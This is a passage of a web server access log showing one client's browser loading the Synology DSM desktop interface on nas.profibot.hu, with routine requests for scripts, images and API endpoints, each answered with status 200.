(KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/WelcomeApp/WelcomeApp.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 21702] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/resources/images/2x/default_wallpaper/dsm7_01.jpg?v=42962" [Client 84.1.26.27] [Length 578302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - POST https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=kcDFKpRQAlHyU&UserType=user&EIO=3&transport=polling&t=Pl6WGao&sid=MYGbsqAY1nkgG_ZuAAAE" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/WelcomeApp/PromotionApp.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 5534] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.BackgroundTask" [Client 84.1.26.27] [Length 1100] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:43 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=64&retina=false&path=webman/3rdparty/FileBrowser/images/icon/FileStation_{0}.png&app_version=1.3.4-1404" [Client 84.1.26.27] [Length 5416] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=64&retina=false&path=webman/3rdparty/AntiVirus/images/anti_virus_{0}.png&app_version=1.5.4-3099" [Client 84.1.26.27] [Length 5277] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "//synoscgi.sock/socket.io/?Version=42962&SynoToken=kcDFKpRQAlHyU&UserType=user&EIO=3&transport=polling&t=Pl6WGap&sid=MYGbsqAY1nkgG_ZuAAAE" [Client 84.1.26.27] [Length 3] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.EW.Info" [Client 84.1.26.27] [Length 158] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/HelpUtils.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 929] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/LoginNotify/LoginNotify.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 682] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResetAdminApp/ResetAdminApp.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 4653] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/Main.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 8820] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/HelpBrowser.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 14796] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.PersonalSettings&method=wallpaper&version=1&path=%22%22&retina=true&id=1&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 578302] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/images/1x/wdheader_bt_close.png?v=9135693d6266ca5497970e4b5364da96" [Client 84.1.26.27] [Length 1304] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/synoSDSjslib/sds.css?v=1654081517" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/synoSDSjslib/images/1x/wdheader_bt_maximize.png?v=bd313f935fb44a57c6860fa43665267f" [Client 84.1.26.27] [Length 583] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/synoSDSjslib/sds.css?v=1654081517" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/MainVue.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 16917] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 71] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/external_device_util.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 500] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/circleGradient.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 2456] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/images/1x/wdgt_icn_title_storage_manager.png?v=42962-s9" [Client 84.1.26.27] [Length 979] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BandwidthControl/BandwidthControl.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 6408] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/TreeGrid.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 5290] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/wdgt_icn_title_resource_monitor.png?v=42962-s9" [Client 84.1.26.27] [Length 836] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/images/1x/wdgt_icn_title_system_info.png?v=42962-s9" [Client 84.1.26.27] [Length 917] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/7adb794f0fe9d4a77719e41e1a25e1f9.png" [Client 84.1.26.27] [Length 220] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/SystemHealthWidget.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 3404] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/3c897e31395646e7a99f2edfe18b4636.png" [Client 84.1.26.27] [Length 343] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/07d87cfdf16ea8886709ecad67ac55f7.png" [Client 84.1.26.27] [Length 1068] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Widgets/assets/dd419236e9fc389651fc2a76836cc31d.png" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/Widgets/style.css?v=1661421011" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SystemInfoApp/StorageUsageWidget.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 2236] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Echarts/echarts.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 239306] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/col-move-top.png?v=6813d550c46547038091cf81ed89300f" [Client 84.1.26.27] [Length 965] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/col-move-bottom.png?v=d5dbff884dc200e502ea46e943f54957" [Client 84.1.26.27] [Length 967] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Echarts/syno_echarts_patch.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1126] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/resource.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 42550] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/resource_widget.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 8424] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AppNotify/AppNotify.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1295] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ConfigBackup/config_backup.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 10113] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/DirectoryServiceVueBundle.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 2582] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Chooser/Chooser.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 3238] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TaskSchedulerUtils/TaskSchedulerUtils.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 8222] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/utils.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 6011] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/PercentageBar.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 824] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/storage_notification.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1226] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/BackgroundTaskMonitor/FileTaskUtil.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 640] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMUpdateNotify/DSMUpdateAction.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 562] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DiskMessageHandler/DiskMessageApp.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1352] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyPhotos/extjs/fileStationExtension.min.js?v=1.3.4-0340&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 415] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive/cloudstation_util.js?v=3.2.1-23280&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 11953] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/S2S.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 773] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/PasswordConfirmDialog.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 829] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SMBService/domain-filter.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 678] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/FileChooser/FileChooser.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 12453] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/LoginStyleVueBundle.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 20123] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileTaskMonitor/TaskGrid.js?v=1.3.4-1404&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1458] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/svg/checkbox.svg" [Client 84.1.26.27] [Length 4052] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/image_load.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 580] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/Utils/lazyDataView.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 2838] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/FileBrowser/FileBrowserUtil.js?v=1.3.4-1404&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 16195] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/MyDSCenter/MyDSCenter.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 1827] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?_dc=1768561903803&SynoToken=kcDFKpRQAlHyU&action=%22external_ip%22&api=SYNO.Core.Desktop.Initdata&method=get&version=1" [Client 84.1.26.27] [Length 113] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/DSMNotify/DSMNotifyVueBundle.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 6327] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[16/Jan/2026:11:11:44 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/NotificationVueBundle.js?v=42962-s9&SynoToken=kcDFKpRQAlHyU" [Client 84.1.26.27] [Length 14148] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 